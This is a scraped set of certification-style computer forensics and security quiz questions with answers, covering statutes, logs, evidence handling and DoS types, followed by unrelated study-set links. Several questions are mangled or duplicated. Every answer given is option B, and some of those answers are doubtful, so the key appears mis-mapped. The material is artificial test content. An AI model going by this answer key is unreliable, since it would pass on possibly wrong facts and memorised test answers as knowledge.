169 ( Topic 2) Under which Federal Statutes does FBI investigate for computer crimes involving e- mail scams and mail fraud? A. 18 U.S.C. 1029 Possession of Access Devices B. 18 U.S.C. 1030 Fraud and related activity in connection with computers C. 18 U.S.C. 1343 Fraud by wire, radio or television D. 18 U.S.C. 1361 Injury to Government Property E. 18 U.S.C. 1362 Government communication systems F. 18 U.S.C. 1831 Economic Espionage Act G. 18 U.S.C. 1832 Trade Secrets Act

B. 18 U.S.C. 1030 Fraud and related activity in connection with computers

168 ( Topic 2) In Linux, what is the smallest possible shellcode? A. 8 bytes B. 24 bytes C. 800 bytes D. 80 bytes

B. 24 bytes

122 ( Topic 2) When reviewing web logs, you see an entry for esource not found?in the HTTP status code field. What is the actual error code that you wouldWhen reviewing web logs, you see an entry for ?esource not found?in the HTTP status code field. What is the actual error code that you would see in the log for esource not found?see in the log for ?esource not found? A. 202 B. 404 C. 606 D. 999

B. 404

127 ( Topic 2) When reviewing web logs, you see an entry for resource not found in the HTTP status code filed. What is the actual error code that you would see in the log for resource not found? A. 202 B. 404 C. 505 D. 909

B. 404

151 ( Topic 2) Sectors in hard disks typically contain how many bytes? A. 256 B. 512 C. 1024 D. 2048

B. 512

178 ( Topic 2) Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment? A. A system using Trojaned commands B. A honeypot that traps hackers C. An environment set up after the user logs in D. An environment set up before an user logs in

B. A honeypot that traps hackers

162 ( Topic 2) When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used? A. Passive IDS B. Active IDS C. NIPS D. Progressive IDS

B. Active IDS

185 ( Topic 2) Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search. link:www.ghttech.net What will this search produce? A. All search engines that link to .net domains B. All sites that link to ghttech.net C. Sites that contain the code: link:www.ghttech.net D. All sites that ghttech.net links to

B. All sites that link to ghttech.net

192 ( Topic 2) What type of flash memory card comes in either Type I or Type II and consumes only five percent of the power required by small hard drives? A. SD memory B. CF memory C. MMC memory D. SM memory

B. CF memory

109 ( Topic 2) ____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence. A. Network Forensics B. Computer Forensics C. Incident Response D. Event Reaction

B. Computer Forensics

132 ( Topic 2) You are assisting in the investigation of a possible Web Server hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a pornographic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site? A. ARP Poisoning B. DNS Poisoning C. HTTP redirect attack D. IP Spoofing

B. DNS Poisoning

120 ( Topic 2) Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops? A. DFS Encryption B. EFS Encryption C. SDW Encryption D. IPS Encryption

B. EFS Encryption

138 ( Topic 2) Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected? A. Point-to-point B. End-to-end C. Thorough D. Complete event analysis

B. End-to-end

125 ( Topic 2) You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing? A. Demonstrate that no system can be protected againstDoS attacks B. List weak points on their network C. Show outdatedeQuipment so it can be replaced D. Use attack as a launching point to penetrate deeper into the network

B. List weak points on their network

103 ( Topic 2) Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States? A. Internet Fraud Complaint Center B. Local or national office of the U.S. Secret Service C. National Infrastructure Protection Center D. CERT Coordination Center

B. Local or national office of the U.S. Secret Service

165 ( Topic 2) Which program is the oot loader?when Windows XP starts up?Which program is the ?oot loader?when Windows XP starts up? A. KERNEL.EXE B. NTLDR C. LOADER D. LILO

B. NTLDR

200 ( Topic 2) George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as "stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation? A. Nessus cannot perform wireless testing B. Nessus is too loud C. There are no ways of performing a "stealthy" wireless scan D. Nessus is not a network scanner

B. Nessus is too loud

104 ( Topic 2) Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the next sequence of events? A. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media B. Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence C. Connect the target media; Delete the system for acquisition; Secure the evidence; Copy the media D. Secure the evidence; Prepare the system for acquisition; Connect the target media; Copy the media

B. Prepare the system for acquisition; Connect the target media; Copy the media; Secure the evidence

129 ( Topic 2) When cataloging digital evidence, the primary goal is to A. Make bit-stream images of all hard drives B. Preserve evidence integrity C. Not remove the evidence from the scene D. Not allow the computer to be turned off

B. Preserve evidence integrity

194 ( Topic 2) When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected. A. Hard Drive Failure B. Scope Creep C. Unauthorized expenses D. Overzealous marketing

B. Scope Creep

107 ( Topic 2) James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network? A. Fraggle B. Smurf C. SYN flood D. Trinoo

B. Smurf Explanation: The Fraggle attack is like a smurf attack, but uses UDP packets and not ICMP.

161 ( Topic 2) Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident? A. The manufacturer of the system compromised B. The logic, formatting and elegance of the code used in the attack C. The nature of the attack D. The vulnerability exploited in the incident

B. The logic, formatting and elegance of the code used in the attack

128 ( Topic 2) When examining the log files from a Windows IIS Web Server, how often is a new log file created? A. the same log is used at all times B. a new log file is created everyday C. a new log file is created each week D. a new log is created each time the Web Server is started

B. a new log file is created everyday Explanation: Wecannot tell if the question is referring to the httperr.log file (IIS 6.0) or is it referring to the logfiles for the website. If IIS is the case, a new log file is created every day should be the correct answer. Microsoft creates the log files in the following format: exYYMMdd.log format and rotates them daily.

181 ( Topic 2) Diskcopy is: A. a utility by AccessData B. a standard MS-DOS command C. Digital Intelligence utility D. dd copying tool

B. a standard MS-DOS command Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.

164 ( Topic 2) You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents. Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer? A. Stringsearch B. grep C. dir D. vim

B. grep

117 ( Topic 2) One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example, changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the correct extension? A. the File Allocation Table B. the file header C. the file footer D. the sector map

B. the file header

108 ( Topic 2) Corporate investigations are typically easier than public investigations because: A. the users have standard corporate equipment and software B. the investigator does not have to get a warrant C. the investigator has to get a warrant D. the users can load whatever they want on their machines

B. the investigator does not have to get a warrant


संबंधित स्टडी सेट्स

Psychology of Learning Troy University Test 5 - Rost

View Set

Money & Banking HW #2, Econ 3229 quiz 4, Money & Banking Chapter 4.2, Ch 4 Econ 3311, MB Chaper 4 Quiz, chapter 4, Midterm #1 Quiz Practice, Chapter 4 Quiz, Chapter Three, Mishkin Chapter 3 What is Money?, Chapter 3, Monetary Policy Chapter Three, Mo...

View Set

Fundamentals of Nursing Unit 7 Ch. 41.

View Set

AP Psych Unit II Practice Questions (all)

View Set

Midterm 2 - Psychology 105 - Attachment Theory and Erikson's Psychosocial Development

View Set

Chapter 31- Quiz #5 & Lecture Material

View Set

Chapter 35: The Adolescent and Family

View Set